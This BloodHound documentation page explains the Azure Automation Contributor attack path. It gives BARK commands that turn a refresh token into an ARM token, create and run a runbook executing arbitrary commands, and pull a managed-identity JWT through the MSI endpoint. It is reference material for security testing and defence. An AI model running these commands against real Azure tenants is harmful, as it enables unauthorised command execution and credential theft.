> ## Documentation Index > Fetch the complete documentation index at: https://bloodhound.specterops.io/llms.txt > Use this file to discover all available pages before exploring further. # AZAutomationContributor > The Azure Automation Contributor role grants full control of the target Azure Automation Account. This includes the ability to execute arbitrary commands on the Automation Account. Applies to BloodHound Enterprise and CE ## Abuse Info You can use BARK’s New-AzureAutomationAccountRunBook and Get-AzureAutomationAccountRunBookOutput functions to execute arbitrary commands against the target Automation Account. These functions require you to supply an Azure Resource Manager scoped JWT associated with the principal that has the privilege to add or modify and run Automation Account run books. There are several ways to acquire a JWT. For example, you may use BARK’s Get-ARMTokenWithRefreshToken to acquire an Azure RM-scoped JWT by supplying a refresh token: ```bash theme={null} $ARMToken = Get-ARMTokenWithRefreshToken ` -RefreshToken "0.ARwA6WgJJ9X2qk..." ` -TenantID "contoso.onmicrosoft.com" ``` Now you can use BARK’s New-AzureAutomationAccountRunBook function to add a new runbook to the target Automation Account, specifying a command to execute using the -Script parameter: ```bash theme={null} New-AzureAutomationAccountRunBook ` -Token $ARMToken ` -RunBookName "MyCoolRunBook" ` -AutomationAccountPath "https://management.azure.com/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourceGroups/AutomationAccts/providers/Microsoft.Automation/automationAccounts/MyCoolAutomationAccount" ` -Script "whoami" ``` After adding the new runbook, you must execute it and fetch its output. You can do this automatically with BARK’s Get-AzureAutomationAccountRunBookOutput function: ```bash theme={null} Get-AzureAutomationAccountRunBookOutput ` -Token $ARMToken ` -RunBookName "MyCoolRunBook" ` -AutomationAccountPath "https://management.azure.com/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourceGroups/AutomationAccts/providers/Microsoft.Automation/automationAccounts/MyCoolAutomationAccount" ``` If the Automation Account has a managed identity assignment, you can use these two functions to retrieve a JWT for the service principal like this: ```bash theme={null} $Script = $tokenAuthURI = $env:MSI_ENDPOINT + "?resource=https://graph.microsoft.com/&api-version=2017-09-01"; $tokenResponse = Invoke-RestMethod -Method Get -Headers @{"Secret"="$env:MSI_SECRET"} -Uri $tokenAuthURI; $tokenResponse.access_token New-AzureAutomationAccountRunBook -Token $ARMToken -RunBookName "MyCoolRunBook" -AutomationAccountPath "https://management.azure.com/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourceGroups/AutomationAccts/providers/Microsoft.Automation/automationAccounts/MyCoolAutomationAccount" -Script $Script Get-AzureAutomationAccountRunBookOutput -Token $ARMToken -RunBookName "MyCoolRunBook" -AutomationAccountPath "https://management.azure.com/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourceGroups/AutomationAccts/providers/Microsoft.Automation/automationAccounts/MyCoolAutomationAccount" ``` If successful, the output will include a JWT for the managed identity service principal. ## Opsec Considerations This will depend on which particular abuse you perform, but in general Azure will create a log event for each abuse. ## References * [https://github.com/BloodHoundAD/BARK](https://github.com/BloodHoundAD/BARK) * [https://specterops.io/blog/2022/06/06/managed-identity-attack-paths-part-1-automation-accounts/](https://specterops.io/blog/2022/06/06/managed-identity-attack-paths-part-1-automation-accounts/) * [https://specterops.io/blog/2023/04/18/introducing-bloodhound-4-3-get-global-admin-more-often/](https://specterops.io/blog/2023/04/18/introducing-bloodhound-4-3-get-global-admin-more-often/)